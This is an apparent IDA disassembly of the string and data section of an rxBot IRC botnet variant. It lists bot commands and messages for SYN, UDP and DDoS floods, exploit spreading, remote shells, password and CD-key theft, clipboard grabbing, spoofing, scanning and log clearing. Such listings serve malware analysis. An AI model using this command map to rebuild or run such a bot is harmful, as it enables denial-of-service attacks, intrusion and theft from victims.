dword_42E70C dd 636364h ; DATA XREF: sub_40274D+33EC�o
aJoinPart db 'join/part',0 ; DATA XREF: sub_40274D+32BA�o
align 4
aNickS_0 db 'NICK %s',0 ; DATA XREF: sub_40274D+329D�o
; sub_40274D+34D3�o ...
aSI db '%s%i',0 ; DATA XREF: sub_40274D+3285�o
; sub_40A800+4E�o ...
align 4
aPnick db 'pnick',0 ; DATA XREF: sub_40274D+324B�o
align 4
aPartSS db 'part %s %s',0 ; DATA XREF: sub_40274D+322E�o
; sub_40274D+3308�o ...
align 10h
aPartflood db 'partflood',0 ; DATA XREF: sub_40274D+320A�o
align 4
aPartS db 'part %s',0 ; DATA XREF: sub_40274D+31ED�o
aPart_0 db 'part',0 ; DATA XREF: sub_40274D+31CE�o
; sub_40274D+3A80�o
align 4
aJoinS db 'join %s',0 ; DATA XREF: sub_40274D+31B1�o
; sub_40274D+32E2�o ...
aJoin db 'join',0 ; DATA XREF: sub_40274D+3192�o
; sub_40274D+3A56�o
align 4
aModeSS db 'mode %s %s',0 ; DATA XREF: sub_40274D+3175�o
align 4
aMode db 'mode',0 ; DATA XREF: sub_40274D+312F�o
; sub_40274D+4681�o
align 10h
aNoticeSS_0 db 'notice %s :%s',0 ; DATA XREF: sub_40274D+3112�o
align 10h
aNt db 'nt',0 ; DATA XREF: sub_40274D+30CC�o
align 4
dword_42E794 dd 76697270h, 2067736Dh, 3A207325h, 1732501h, 0
; DATA XREF: sub_40274D+30AF�o
dword_42E7A8 dd 7463h ; DATA XREF: sub_40274D+3069�o
aPrivmsgSS db 'privmsg %s :%s',0 ; DATA XREF: sub_40274D+304C�o
; sub_40274D+360A�o ...
align 4
a_: ; DATA XREF: sub_40274D+3023�o
; sub_40274D+3086�o ...
unicode 0, <_>,0
aPm db 'pm',0 ; DATA XREF: sub_40274D+3006�o
; sub_40274D+460E�o
align 4
unk_42E7C4 db 2Dh ; - ; DATA XREF: sub_40274D+2FD7�o
db 3, 34h, 2
db 69h ; i
db 72h, 63h, 66h
db 75h ; u
db 63h, 6Bh, 2
db 3
aSClonesLoadedT db '- %s clones loaded to %s:%s',0
align 10h
aLoad db 'load',0 ; DATA XREF: sub_40274D+2F8F�o
align 4
aFlood db 'flood',0 ; DATA XREF: sub_40274D+2F66�o
align 10h
aRinms db 'rinms',0 ; DATA XREF: sub_40274D+2F4F�o
align 4
aReconnect_in_m db 'reconnect.in.ms',0 ; DATA XREF: sub_40274D+2F3A�o
aRin db 'rin',0 ; DATA XREF: sub_40274D+2F25�o
aReconnect_in db 'reconnect.in',0 ; DATA XREF: sub_40274D+2F10�o
align 4
unk_42E82C db 2Dh ; - ; DATA XREF: sub_40274D+2EF0�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aFailedToStartE db '- Failed to start exploiter thread, error: <%d>.',0
align 4
unk_42E86C db 2Dh ; - ; DATA XREF: sub_40274D+2E94�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aAttemptingToCo db '- attempting to compromise %s...',0
align 4
aExploit db 'exploit',0 ; DATA XREF: sub_40274D+2E17�o
unk_42E8A4 db 2Dh ; - ; DATA XREF: sub_40274D+2DF9�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofIpSetToS_ db ' Spoof IP set to ',27h,'%s',27h,'.',0
align 10h
unk_42E8D0 db 2Dh ; - ; DATA XREF: sub_40274D+2DCF�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSIsAnInvalidIp db ' ',27h,'%s',27h,' is an invalid IP address.',0
aD_D_D_ db '%d.%d.%d.*',0 ; DATA XREF: sub_40274D+2D97�o
align 10h
unk_42E910 db 2Dh ; - ; DATA XREF: sub_40274D+2D3E�o
; sub_40274D+2DAF�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingCurren db ' Spoofing currently set to ',27h,'%s',27h,'.',0
align 4
aGet_0 db 'get',0 ; DATA XREF: sub_40274D:loc_405469�o
; sub_40274D+3C78�o
unk_42E94C db 2Dh ; - ; DATA XREF: sub_40274D+2CB0�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aInvalidLoginSl db 'Invalid login slot number: %d.',0
align 4
unk_42E978 db 2Dh ; - ; DATA XREF: sub_40274D+2CA5�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aNoUserLoggedIn db 'No user logged in at slot: %d.',0
align 4
dword_42E9A4 dd 234032Dh, 6E69616Dh, 202D0302h, 7325h, 0 ; DATA XREF: sub_40274D+2C57�o
unk_42E9B8 db 2Dh ; - ; DATA XREF: sub_40274D:loc_405395�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aThisModOfRxbot db 'This mod of rxBot is dedicated to Pia Gerhardt (nameless@efnet/ir'
db 'cnet), the Beautiful Operatress from Heaven (or Bitch Operatress '
db 'from Hell?) who I love so much.',0
align 4
dword_42EA68 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_40274D+2C16�o
aFailedToSta_18 db '- Failed to start secure thread, error: <%d>.',0
align 4
dword_42EAA4 dd 234032Dh, 75636573h, 3026572h, 7325202Dh, 73797320h
; DATA XREF: sub_40274D+2BB2�o
dd 2E6D6574h, 0
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_40274D+2BAC�o
align 4
aSecuring db 'Securing',0 ; DATA XREF: sub_40274D+2BA5�o
align 4
unk_42EAD8 db 2Dh ; - ; DATA XREF: sub_40274D+2B1C�o
db 3, 34h, 2
db 62h ; b
db 69h, 6Eh, 64h
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aFailedToSta_19 db ' Failed to start server thread, error: <%d>.',0
align 4
unk_42EB18 db 2Dh ; - ; DATA XREF: sub_40274D+2AB1�o
db 3, 34h, 2
db 62h ; b
db 69h, 6Eh, 64h
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aServerStartedO db ' Server started on: %s:%d.',0
align 4
dword_42EB44 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_40274D+2A20�o
aFailedToSta_20 db '- Failed to start server thread, error: <%d>.',0
align 10h
dword_42EB80 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_40274D+29C7�o
aServerStarte_0 db '- Server started on: %s:%d.',0
dword_42EBA8 dd 234032Dh, 646E6966h, 656C6966h, 2D0302h ; DATA XREF: sub_40274D+2909�o
aFindFile db 'Find file',0 ; DATA XREF: sub_40274D+2904�o
align 4
dword_42EBC4 dd 234032Dh, 636F7270h, 2D030273h, 0 ; DATA XREF: sub_40274D+28F7�o
aProcessList db 'Process list',0 ; DATA XREF: sub_40274D+28F2�o
align 4
dword_42EBE4 dd 234032Dh, 6E69616Dh, 202D0302h, 6F636552h, 63656E6Eh
; DATA XREF: sub_40274D+288C�o
dd 676E6974h, 2Eh
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_40274D:loc_404FCC�o
; sub_40274D:loc_409FE3�o ...
align 4
dword_42EC18 dd 234032Dh, 6E69616Dh, 202D0302h, 63736944h, 656E6E6Fh
; DATA XREF: sub_40274D+286A�o
dd 6E697463h, 2E67h
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_40274D:loc_404FAA�o
align 4
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_40274D:loc_404F93�o
; sub_40274D+76C8�o
align 4
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+2834�o
align 4
unk_42EC68 db 2Dh ; - ; DATA XREF: sub_40274D+27EE�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aStatusReady_Bo db 'Status: Ready. Bot Uptime: %s.',0
align 4
dword_42EC94 dd 234032Dh, 6E69616Dh, 202D0302h, 20746F42h, 203A4449h
; DATA XREF: sub_40274D+27B3�o
dd 2E7325h
unk_42ECAC db 2Dh ; - ; DATA XREF: sub_40274D+2789�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aFailedToSta_21 db '- Failed to start list thread, error: <%d>.',0
align 4
dword_42ECE8 dd 234032Dh, 65726874h, 2736461h, 4C202D03h, 20747369h
; DATA XREF: sub_40274D+2730�o
dd 65726874h, 2E736461h, 0
dword_42ED08 dd 627573h ; DATA XREF: sub_40274D+270A�o
dword_42ED0C dd 234032Dh, 6E69616Dh, 202D0302h, 61696C41h, 696C2073h
; DATA XREF: sub_40274D+26C1�o
dd 2E7473h
unk_42ED24 db 2Dh ; - ; DATA XREF: sub_40274D+2694�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aFailedToSta_22 db '- Failed to start listing thread, error: <%d>.',0
dword_42ED5C dd 234032Dh, 2676F6Ch, 4C202D03h, 69747369h, 6C20676Eh
; DATA XREF: sub_40274D+263B�o
dd 2E676Fh
dword_42ED74 dd 234032Dh, 6E69616Dh, 202D0302h, 7774654Eh, 206B726Fh
; DATA XREF: sub_40274D+25A7�o
dd 6F666E49h, 2Eh
dword_42ED90 dd 234032Dh, 6E69616Dh, 202D0302h, 74737953h, 49206D65h
; DATA XREF: sub_40274D+2578�o
dd 2E6F666Eh, 0
dword_42EDAC dd 234032Dh, 6E69616Dh, 202D0302h, 6F6D6552h, 676E6976h
; DATA XREF: sub_40274D+252B�o
dd 746F4220h, 2Eh
unk_42EDC8 db 2Dh ; - ; DATA XREF: sub_40274D+24FA�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToSta_23 db ' Failed to start listing thread, error: <%d>.',0
align 4
dword_42EE04 dd 234032Dh, 636F7270h, 2D030273h, 6F725020h, 73656363h
; DATA XREF: sub_40274D+249B�o
dd 696C2073h, 2E7473h
aFull db 'full',0 ; DATA XREF: sub_40274D+247B�o
align 4
unk_42EE28 db 2Dh ; - ; DATA XREF: sub_40274D+2425�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aAlreadyRunni_3 db ' Already running.',0
align 4
dword_42EE48 dd 234032Dh, 656B6463h, 3027379h ; DATA XREF: sub_40274D+23FC�o
aSearchComplete db '- Search completed.',0
dword_42EE68 dd 234032Dh, 6E69616Dh, 202D0302h, 69747055h, 203A656Dh
; DATA XREF: sub_40274D+23B6�o
dd 2E7325h
unk_42EE80 db 2Dh ; - ; DATA XREF: sub_40274D:loc_404A48�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteShellRea db '- Remote shell ready.',0
align 10h
unk_42EEA0 db 2Dh ; - ; DATA XREF: sub_40274D+22F4�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldnTOpenRem db '- Couldn',27h,'t open remote shell.',0
align 4
unk_42EEC8 db 2Dh ; - ; DATA XREF: sub_40274D+22DB�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteShellAlr db '- Remote shell already running.',0
align 4
dword_42EEF4 dd 234032Dh, 6E69616Dh, 202D0302h, 20746547h, 70696C43h
; DATA XREF: sub_40274D+22C0�o
dd 72616F62h, 2E64h
dword_42EF10 dd 234032Dh, 70696C63h, 72616F62h, 61642064h, 3026174h
; DATA XREF: sub_40274D+2298�o
dd 2Dh
unk_42EF28 db 2Dh ; - ; DATA XREF: sub_40274D:loc_4049D5�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToFlushA db 'Failed to flush ARP cache.',0
align 4
unk_42EF54 db 2Dh ; - ; DATA XREF: sub_40274D+2281�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aArpCacheFlushe db 'ARP cache flushed.',0
align 4
unk_42EF78 db 2Dh ; - ; DATA XREF: sub_40274D:loc_4049A4�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToLoadDn db 'Failed to load dnsapi.dll.',0
align 4
unk_42EFA4 db 2Dh ; - ; DATA XREF: sub_40274D:loc_40499D�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToFlushD db 'Failed to flush DNS cache.',0
align 10h
unk_42EFD0 db 2Dh ; - ; DATA XREF: sub_40274D+2249�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aDnsCacheFlushe db 'DNS cache flushed.',0
align 4
unk_42EFF4 db 2Dh ; - ; DATA XREF: sub_40274D+21C8�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToSta_24 db '- Failed to start server thread, error: <%d>.',0
align 10h
unk_42F030 db 2Dh ; - ; DATA XREF: sub_40274D+216F�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aServerListenin db '- Server listening on IP: %s:%d, Username: %s.',0
unk_42F06C db 2Dh ; - ; DATA XREF: sub_40274D+209D�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_25 db ' Failed to start server thread, error: <%d>.',0
align 4
unk_42F0A8 db 2Dh ; - ; DATA XREF: sub_40274D+2044�o
; seg000:0040BAD0�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerListen_0 db ' Server listening on IP: %s:%d, Directory: %s\.',0
unk_42F0E4 db 2Dh ; - ; DATA XREF: sub_40274D+1F31�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_26 db ' Failed to start server thread, error: <%d>.',0
align 10h
unk_42F120 db 2Dh ; - ; DATA XREF: sub_40274D+1ED8�o
; seg000:0040B767�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aServerStarte_1 db ' Server started on Port: %d, File: %s.',0
align 4
unk_42F154 db 2Dh ; - ; DATA XREF: sub_40274D+1E34�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aAlreadyRunni_4 db ' Already running.',0
align 4
unk_42F174 db 2Dh ; - ; DATA XREF: sub_40274D:loc_40456B�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aFailedToSta_27 db '- Failed to start scan, port is invalid.',0
align 4
unk_42F1AC db 2Dh ; - ; DATA XREF: sub_40274D+1DBF�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aFailedToSta_28 db '- Failed to start scan thread, error: <%d>.',0
align 4
unk_42F1E8 db 2Dh ; - ; DATA XREF: sub_40274D+1D60�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aSPortScanSta_0 db '- %s Port Scan started on %s:%d with a delay of %d seconds for %d'
db ' minutes using %d threads.',0
align 4
aSequential db 'Sequential',0 ; DATA XREF: sub_40274D+1D35�o
; sub_40274D+5909�o
align 10h
aRandom db 'Random',0 ; DATA XREF: sub_40274D+1D2E�o
; sub_40274D+5902�o
align 4
unk_42F268 db 2Dh ; - ; DATA XREF: sub_40274D+1B80�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aAlreadyDScan_0 db '- Already %d scanning threads. Too many specified.',0
unk_42F2A8 db 2Dh ; - ; DATA XREF: sub_40274D+1B0D�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aFailedToSta_29 db 'Failed to start search thread, error: <%d>.',0
unk_42F2E4 db 2Dh ; - ; DATA XREF: sub_40274D+1AA3�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aSearchingForPa db 'Searching for password.',0
aFp db 'fp',0 ; DATA XREF: sub_40274D+1A66�o
align 10h
aFindpass db 'findpass',0 ; DATA XREF: sub_40274D+1A55�o
align 4
aNoticeSPhoning db 'NOTICE %s :PHONING HOME: hi ;).',0Dh,0Ah,0 ; DATA XREF: sub_40274D+1A3F�o
align 10h
aPhonehome db 'phonehome',0 ; DATA XREF: sub_40274D+1A28�o
align 4
aScanall db 'scanall',0 ; DATA XREF: sub_40274D+19FE�o
dword_42F354 dd 234032Dh, 6E69616Dh, 202D0302h, 73617243h, 676E6968h
; DATA XREF: sub_40274D+19B1�o
dd 746F6220h, 2Eh
aCrash db 'crash',0 ; DATA XREF: sub_40274D+199B�o
; sub_40274D+19E8�o
align 4
aTftp db 'tftp',0 ; DATA XREF: sub_40274D+1986�o
align 10h
aTftpserver db 'tftpserver',0 ; DATA XREF: sub_40274D+1971�o
align 4
aHttp db 'http',0 ; DATA XREF: sub_40274D+195C�o
align 4
aHttpserver db 'httpserver',0 ; DATA XREF: sub_40274D+1947�o
align 10h
aRlogin db 'rlogin',0 ; DATA XREF: sub_40274D+1932�o
align 4
aRloginserver db 'rloginserver',0 ; DATA XREF: sub_40274D+191D�o
align 4
aCip db 'cip',0 ; DATA XREF: sub_40274D+1908�o
aCurrentip db 'currentip',0 ; DATA XREF: sub_40274D+18F3�o
align 4
aFdns db 'fdns',0 ; DATA XREF: sub_40274D+18DE�o
align 10h
aFlushdns db 'flushdns',0 ; DATA XREF: sub_40274D+18C9�o
align 4
aFarp db 'farp',0 ; DATA XREF: sub_40274D+18B4�o
align 4
aFlusharp db 'flusharp',0 ; DATA XREF: sub_40274D+189F�o
align 10h
aGc db 'gc',0 ; DATA XREF: sub_40274D+188A�o
align 4
aGetclip db 'getclip',0 ; DATA XREF: sub_40274D+1875�o
unk_42F3FC db 2Dh ; - ; DATA XREF: sub_40274D+183D�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingDisabl db ' Spoofing disabled.',0
aOff db 'off',0 ; DATA XREF: sub_40274D+1822�o
; sub_40274D+39C9�o ...
aSpoof db 'spoof',0 ; DATA XREF: sub_40274D+180B�o
align 10h
unk_42F430 db 2Dh ; - ; DATA XREF: sub_40274D+17F0�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aLoginListCompl db 'Login list complete.',0
align 4
aD_S db '%d. %s',0 ; DATA XREF: sub_40274D+17BB�o
; seg000:0040AF36�o
align 4
aEmpty db '<Empty>',0 ; DATA XREF: sub_40274D:loc_403EF9�o
dword_42F464 dd 234032Dh, 69676F6Ch, 696C206Eh, 3027473h, 2Dh
; DATA XREF: sub_40274D+1784�o
dword_42F478 dd 6F6877h ; DATA XREF: sub_40274D+1767�o
dword_42F47C dd 234032Dh, 2646D63h, 2D03h ; DATA XREF: sub_40274D+175C�o
aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_40274D+1757�o
align 4
aCmdstop db 'cmdstop',0 ; DATA XREF: sub_40274D+1741�o
aOcmd db 'ocmd',0 ; DATA XREF: sub_40274D+172C�o
align 4
aOpencmd db 'opencmd',0 ; DATA XREF: sub_40274D+1717�o
aDll db 'dll',0 ; DATA XREF: sub_40274D+1702�o
aTestdlls db 'testdlls',0 ; DATA XREF: sub_40274D+16ED�o
align 10h
aDrv db 'drv',0 ; DATA XREF: sub_40274D+16D8�o
aDriveinfo db 'driveinfo',0 ; DATA XREF: sub_40274D+16C3�o
align 10h
aUp db 'up',0 ; DATA XREF: sub_40274D+16AE�o
; sub_40274D+4864�o
align 4
aUptime db 'uptime',0 ; DATA XREF: sub_40274D+1699�o
align 4
aKey db 'key',0 ; DATA XREF: sub_40274D+1684�o
aGetcdkeys db 'getcdkeys',0 ; DATA XREF: sub_40274D+166F�o
align 4
aPs db 'ps',0 ; DATA XREF: sub_40274D+165A�o
align 10h
aProcs db 'procs',0 ; DATA XREF: sub_40274D+1645�o
align 4
aRm db 'rm',0 ; DATA XREF: sub_40274D+1630�o
align 4
aRemove db 'remove',0 ; DATA XREF: sub_40274D+161B�o
align 4
aSi db 'si',0 ; DATA XREF: sub_40274D+1606�o
align 4
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_40274D+15F1�o
aNi db 'ni',0 ; DATA XREF: sub_40274D+15DC�o
align 4
aNetinfo db 'netinfo',0 ; DATA XREF: sub_40274D+15C7�o
aClg db 'clg',0 ; DATA XREF: sub_40274D+15B2�o
aClearlog db 'clearlog',0 ; DATA XREF: sub_40274D+159D�o
align 4
aLg db 'lg',0 ; DATA XREF: sub_40274D+1588�o
align 10h
aLog db 'log',0 ; DATA XREF: sub_40274D+1573�o
; sub_424391:loc_424419�o ...
aAl db 'al',0 ; DATA XREF: sub_40274D+155E�o
align 4
aAliases db 'aliases',0 ; DATA XREF: sub_40274D+1549�o
aT: ; DATA XREF: sub_40274D+1534�o
; seg002:00442EE8�o ...
unicode 0, <t>,0
aThreads db 'threads',0 ; DATA XREF: sub_40274D+151F�o
unk_42F54C db 2Dh ; - ; DATA XREF: sub_40274D+14EE�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToReboot db 'Failed to reboot system.',0
align 4
unk_42F574 db 2Dh ; - ; DATA XREF: sub_40274D+14E7�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aRebootingSyste db 'Rebooting system.',0
align 4
aReboot db 'reboot',0 ; DATA XREF: sub_40274D+14D0�o
align 4
aI: ; DATA XREF: sub_40274D+14BB�o
; seg002:00442EF4�o ...
unicode 0, <i>,0
aId db 'id',0 ; DATA XREF: sub_40274D+14A6�o
align 4
aS_5: ; DATA XREF: sub_40274D+1491�o
; seg002:00442F00�o ...
unicode 0, <s>,0
aStatus db 'status',0 ; DATA XREF: sub_40274D+147C�o
align 10h
aQ: ; DATA XREF: sub_40274D+1467�o
; seg002:off_442ED8�o ...
unicode 0, <q>,0
aQuit_0 db 'quit',0 ; DATA XREF: sub_40274D+1452�o
align 4
aDc db 'dc',0 ; DATA XREF: sub_40274D+143D�o
align 10h
aDisconnect db 'disconnect',0 ; DATA XREF: sub_40274D+1428�o
align 4
aR: ; DATA XREF: sub_40274D+1413�o
; sub_40274D+3ABF�o ...
unicode 0, <r>,0
aReconnect db 'reconnect',0 ; DATA XREF: sub_40274D+13FE�o
align 4
aExplist db 'explist',0 ; DATA XREF: sub_40274D+13E9�o
aExploitlist db 'exploitlist',0 ; DATA XREF: sub_40274D+13D4�o
aCbstats db 'cbstats',0 ; DATA XREF: sub_40274D+13BF�o
aConnectbacksta db 'connectbackstats',0 ; DATA XREF: sub_40274D+13AA�o
align 4
aTrstats db 'trstats',0 ; DATA XREF: sub_40274D+1395�o
aTransferstats db 'transferstats',0 ; DATA XREF: sub_40274D+1380�o
align 4
aStats db 'stats',0 ; DATA XREF: sub_40274D+136B�o
align 4
aScanstats db 'scanstats',0 ; DATA XREF: sub_40274D+1356�o
align 4
dword_42F638 dd 234032Dh, 6E616373h, 2D0302h ; DATA XREF: sub_40274D+134B�o
aScan db 'Scan',0 ; DATA XREF: sub_40274D+1346�o
align 4
aScanstop db 'scanstop',0 ; DATA XREF: sub_40274D+1330�o
align 4
dword_42F658 dd 234032Dh, 75636573h, 3026572h, 2Dh ; DATA XREF: sub_40274D+1325�o
aSecure_0 db 'Secure',0 ; DATA XREF: sub_40274D+1320�o
align 10h
aSecurestop db 'securestop',0 ; DATA XREF: sub_40274D+130A�o
align 4
dword_42F67C dd 234032Dh, 6E6F6C63h, 3027365h, 2Dh ; DATA XREF: sub_40274D+12FF�o
aClone db 'Clone',0 ; DATA XREF: sub_40274D+12FA�o
align 4
aClonestop db 'clonestop',0 ; DATA XREF: sub_40274D+12E4�o
align 10h
aPsstop db 'psstop',0 ; DATA XREF: sub_40274D+12CF�o
align 4
aProcsstop db 'procsstop',0 ; DATA XREF: sub_40274D+12BA�o
align 4
aFfstop db 'ffstop',0 ; DATA XREF: sub_40274D+12A5�o
align 4
aFindfilestop db 'findfilestop',0 ; DATA XREF: sub_40274D+1290�o
align 4
dword_42F6CC dd 234032Dh, 70746674h, 2D030264h, 0 ; DATA XREF: sub_40274D+1285�o
aTftpstop db 'tftpstop',0 ; DATA XREF: sub_40274D+126A�o
align 4
aPingstop db 'pingstop',0 ; DATA XREF: sub_40274D+1244�o
align 4
aUdpstop db 'udpstop',0 ; DATA XREF: sub_40274D+121E�o
aWisdomstop db 'wisdomstop',0 ; DATA XREF: sub_40274D+11F8�o
align 4
aTsunamistop db 'tsunamistop',0 ; DATA XREF: sub_40274D+11D2�o
unk_42F714 db 2Dh ; - ; DATA XREF: sub_40274D+11BB�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aAllPacketingAc db 'All packeting activity has been halted.',0
dword_42F748 dd 234032Dh, 64736977h, 3026D6Fh, 2Dh ; DATA XREF: sub_40274D+1186�o
; sub_40274D+1213�o
aWisdomAttack db 'Wisdom attack',0 ; DATA XREF: sub_40274D+1181�o
; sub_40274D+120E�o
align 4
dword_42F768 dd 234032Dh, 6E757374h, 2696D61h, 2D03h ; DATA XREF: sub_40274D+116B�o
; sub_40274D+11ED�o
aTsunamiFlood db 'Tsunami flood',0 ; DATA XREF: sub_40274D+1166�o
; sub_40274D+11E8�o
align 4
dword_42F788 dd 234032Dh, 676E6970h, 2D0302h ; DATA XREF: sub_40274D+1114�o
; sub_40274D+125F�o
aPingFlood db 'Ping flood',0 ; DATA XREF: sub_40274D+110F�o
; sub_40274D+125A�o
align 10h
dword_42F7A0 dd 234032Dh, 2706475h, 2D03h ; DATA XREF: sub_40274D+10F9�o
; sub_40274D+1239�o
aUdpFlood db 'UDP flood',0 ; DATA XREF: sub_40274D+10F4�o
; sub_40274D+1234�o
align 4
aPacketstop db 'packetstop',0 ; DATA XREF: sub_40274D+109D�o
align 4
dword_42F7C4 dd 234032Dh, 6B6E6F77h, 2D0302h ; DATA XREF: sub_40274D+1092�o
; sub_40274D+114D�o
aWonkFlood db 'Wonk flood',0 ; DATA XREF: sub_40274D+108D�o
; sub_40274D+1148�o
align 4
aWonkstop db 'wonkstop',0 ; DATA XREF: sub_40274D+1077�o
align 4
dword_42F7E8 dd 234032Dh, 67726174h, 3023361h, 2Dh ; DATA XREF: sub_40274D+106C�o
; sub_40274D+1132�o
aTarga3Flood db 'Targa3 flood',0 ; DATA XREF: sub_40274D+1067�o
; sub_40274D+112D�o
align 4
aTarga3stop db 'targa3stop',0 ; DATA XREF: sub_40274D+1051�o
align 4
dword_42F814 dd 234032Dh, 73796B73h, 3026E79h, 2Dh ; DATA XREF: sub_40274D+1046�o
; sub_40274D+11A4�o
aSkysynFlood db 'SkySyn flood',0 ; DATA XREF: sub_40274D+1041�o
; sub_40274D+119F�o
align 4
aSkysynstop db 'skysynstop',0 ; DATA XREF: sub_40274D+102B�o
align 10h
dword_42F840 dd 234032Dh, 26E7973h, 2D03h ; DATA XREF: sub_40274D+1020�o
; sub_40274D+10DB�o
aSynFlood db 'Syn flood',0 ; DATA XREF: sub_40274D+101B�o
; sub_40274D+10D6�o
align 4
aSynstop db 'synstop',0 ; DATA XREF: sub_40274D+1005�o
dword_42F860 dd 234032Dh, 736F6464h, 2D0302h ; DATA XREF: sub_40274D+FFA�o
; sub_40274D+10C0�o
aDdosFlood db 'DDoS flood',0 ; DATA XREF: sub_40274D+FF5�o
; sub_40274D+10BB�o
align 4
aDdos_stop db 'ddos.stop',0 ; DATA XREF: sub_40274D+FDF�o
align 4
dword_42F884 dd 234032Dh, 69646572h, 74636572h, 2D0302h ; DATA XREF: sub_40274D+FD4�o
aTcpRedirect db 'TCP redirect',0 ; DATA XREF: sub_40274D+FCF�o
align 4
aRedirectstop db 'redirectstop',0 ; DATA XREF: sub_40274D+FB9�o
align 4
dword_42F8B4 dd 234032Dh, 2676F6Ch, 2D03h ; DATA XREF: sub_40274D+FAE�o
aLogList db 'Log list',0 ; DATA XREF: sub_40274D+FA9�o
align 4
aLogstop db 'logstop',0 ; DATA XREF: sub_40274D+F93�o
